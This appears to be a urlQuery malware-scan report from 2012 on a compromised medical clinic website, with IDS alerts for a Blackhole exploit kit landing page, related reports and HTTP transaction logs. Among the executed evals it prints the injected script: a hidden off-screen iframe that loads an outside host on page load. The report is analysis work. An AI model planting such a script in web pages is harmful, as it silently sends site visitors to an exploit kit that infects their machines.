Overview

URL: http://lipoinnorthernvirginia.com/serv_content.html
IP: 97.74.47.1
ASN: AS26496 GoDaddy.com, LLC
Location: United States
Report completed: 2012-11-06 14:55:17 CET
urlQuery Alerts: Detected malicious iframe injection


Settings

User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer:
Adobe Reader: 8.0
Java: 1.6.0_26


Intrusion Detection Systems

Suricata w/ Emerging Threats Pro: No alerts detected
Snort w/ Sourcefire VRT:

Timestamp | Source IP | Destination IP | Severity | Alert
2012-11-06 14:54:45 | 97.74.47.1 | urlQuery Client | 1 | EXPLOIT-KIT Blackhole landing page with specific structure - prototype catch


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 97.74.47.1

Date | Alerts / IDS | URL | IP
2013-02-23 14:20:56 | 0 / 2 | http://liposuctionindc.com/887.jar | 97.74.47.1
2013-02-22 21:21:48 | 0 / 0 | http://myhandsonwellness.com/ctuk.htm | 97.74.47.1
2013-02-18 13:39:48 | 1 / 8 | http://www.urhalpool.com/nabc2009/index.php?lang=ben | 97.74.47.1
2013-02-12 04:20:57 | 1 / 8 | http://urhalpool.com/nabc2009/index.php?lang=ben | 97.74.47.1
2013-02-08 18:25:27 | 1 / 2 | http://www.herocombat.com/forum/index.php?topic=30167.new | 97.74.47.1
2013-01-31 22:25:09 | 0 / 0 | http://texxxan.com | 97.74.47.1

Last 6 reports on ASN: AS26496 GoDaddy.com, LLC

Date | Alerts / IDS | URL | IP
2013-02-27 15:11:53 | 0 / 4 | http://aquilaplata.com/rox.php | 50.63.202.64
2013-02-27 15:07:43 | 0 / 3 | http://xlotxdxtorwfmvuzfuvtspel.com/2fQqJ8XXLgeEdj0xLjEmaWQ9Mjg5NDMxNTkzOCZhaWQ9NTEwMTkmc2lkPTQ (...) | 50.62.12.103
2013-02-27 15:05:37 | 0 / 9 | http://beauregards.net/ | 184.168.243.187
2013-02-27 15:02:06 | 0 / 2 | http://read101.ca/mun.html | 173.201.185.114
2013-02-27 14:59:47 | 0 / 0 | http://jaffnastmaryscathedral.org/modules/mod_myblog_archive/modules/i/Folder_Baru/202020320938 (...) | 184.168.192.21
2013-02-27 14:59:30 | 0 / 4 | http://xlotxdxtorwfmvuzfuvtspel.com/iffnT7XXIqmwdj0xLjEmaWQ9MTI3ODQzMDQxMSZhaWQ9NTEwMTkmc2lkPTQ (...) | 50.62.12.103

Last 4 reports on domain: lipoinnorthernvirginia.com

Date | Alerts / IDS | URL | IP
2012-12-06 04:30:32 | 1 / 0 | http://lipoinnorthernvirginia.com/lipo1.html | 97.74.47.1
2012-11-07 00:57:40 | 1 / 2 | http://lipoinnorthernvirginia.com/serv_content.html | 97.74.47.1
2012-11-06 10:36:37 | 1 / 1 | http://lipoinnorthernvirginia.com/contact_content.html | 97.74.47.1
2012-11-06 04:42:38 | 1 / 2 | http://lipoinnorthernvirginia.com/serv_content2.html | 97.74.47.1



JavaScript

Executed Scripts (1)


Executed Evals (2)

#1 JavaScript::Eval (size: 286, repeated: 1) - Alert detected on script (Severity: 2)

function frmAdd() {
    var ifrm = document.createElement('iframe');
    ifrm.style.position = 'absolute';
    ifrm.style.top = '-999em';
    ifrm.style.left = '-999em';
    ifrm.src = "http://moreyfineart.com/xml.php";
    ifrm.id = 'frmId';
    document.body.appendChild(ifrm);
};
window.onload = frmAdd;

#2 JavaScript::Eval (size: 3, repeated: 286)

j % 3

Executed Writes (0)



HTTP Transactions (11)


Transaction #1

Request:
GET /serv_content.html HTTP/1.1
Host: lipoinnorthernvirginia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response:
HTTP/1.1 200 OK
Content-Type: text/html
Date: Tue, 06 Nov 2012 13:54:45 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 5251
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

Transaction #2

Request:
GET /styles.css HTTP/1.1
Host: lipoinnorthernvirginia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lipoinnorthernvirginia.com/serv_content.html

Response:
HTTP/1.1 200 OK
Content-Type: text/css
Date: Tue, 06 Nov 2012 13:54:45 GMT
Server: Apache
Last-Modified: Tue, 14 Sep 2010 13:59:19 GMT
Etag: "14c9c4d-19c-490389e861bc0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 217
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive

Transaction #3

Request:
GET /images/secondary/wht_toplft.gif HTTP/1.1
Host: www.lipoinnorthernvirginia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lipoinnorthernvirginia.com/serv_content.html

Response:
HTTP/1.1 200 OK
Content-Type: image/gif
Date: Tue, 06 Nov 2012 13:54:46 GMT
Server: Apache
Last-Modified: Sat, 23 Jan 2010 12:07:28 GMT
Etag: "1c1ef35-49-47dd3c7a6a000"
Accept-Ranges: bytes
Content-Length: 73
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

Transaction #4

Request:
GET /images/vita_bkg.gif HTTP/1.1
Host: www.lipoinnorthernvirginia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lipoinnorthernvirginia.com/serv_content.html

Response:
HTTP/1.1 200 OK
Content-Type: image/gif
Date: Tue, 06 Nov 2012 13:54:46 GMT
Server: Apache
Last-Modified: Sat, 16 Jul 2011 07:43:41 GMT
Etag: "4134754-2c-4a82aecca22df"
Accept-Ranges: bytes
Content-Length: 44
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

Transaction #5

Request:
GET /images/secondary/section_02.gif HTTP/1.1
Host: www.lipoinnorthernvirginia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lipoinnorthernvirginia.com/serv_content.html

Response:
HTTP/1.1 200 OK
Content-Type: image/gif
Date: Tue, 06 Nov 2012 13:54:46 GMT
Server: Apache
Last-Modified: Sat, 23 Jan 2010 12:07:15 GMT
Etag: "1c52fa-2b6-47dd3c6e042c0"
Accept-Ranges: bytes
Content-Length: 694
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

Transaction #6

Request:
GET /images/secondary/pointer.gif HTTP/1.1
Host: www.lipoinnorthernvirginia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lipoinnorthernvirginia.com/serv_content.html

Response:
HTTP/1.1 200 OK
Content-Type: image/gif
Date: Tue, 06 Nov 2012 13:54:46 GMT
Server: Apache
Last-Modified: Sat, 23 Jan 2010 12:07:10 GMT
Etag: "1c52f8-174-47dd3c693f780"
Accept-Ranges: bytes
Content-Length: 372
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

Transaction #7

Request:
GET /images/secondary/photo03.jpg HTTP/1.1
Host: www.lipoinnorthernvirginia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lipoinnorthernvirginia.com/serv_content.html

Response:
HTTP/1.1 200 OK
Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 13:54:46 GMT
Server: Apache
Last-Modified: Sat, 23 Jan 2010 12:07:05 GMT
Etag: "1c52f6-18f7-47dd3c647ac40"
Accept-Ranges: bytes
Content-Length: 6391
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

Transaction #8

Request:
GET /xml.php HTTP/1.1
Host: moreyfineart.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lipoinnorthernvirginia.com/serv_content.html

Response:
HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Tue, 06 Nov 2012 13:54:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked

Transaction #9

Request:
GET /favicon.ico HTTP/1.1
Host: lipoinnorthernvirginia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response:
HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Tue, 06 Nov 2012 13:54:49 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 9837
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

Transaction #10

Request:
GET /favicon.ico HTTP/1.1
Host: lipoinnorthernvirginia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response:
HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Tue, 06 Nov 2012 13:54:46 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 9837
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive

Transaction #11

Request:
GET /favicon.ico HTTP/1.1
Host: lipoinnorthernvirginia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response:
HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Tue, 06 Nov 2012 13:54:47 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 9837
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive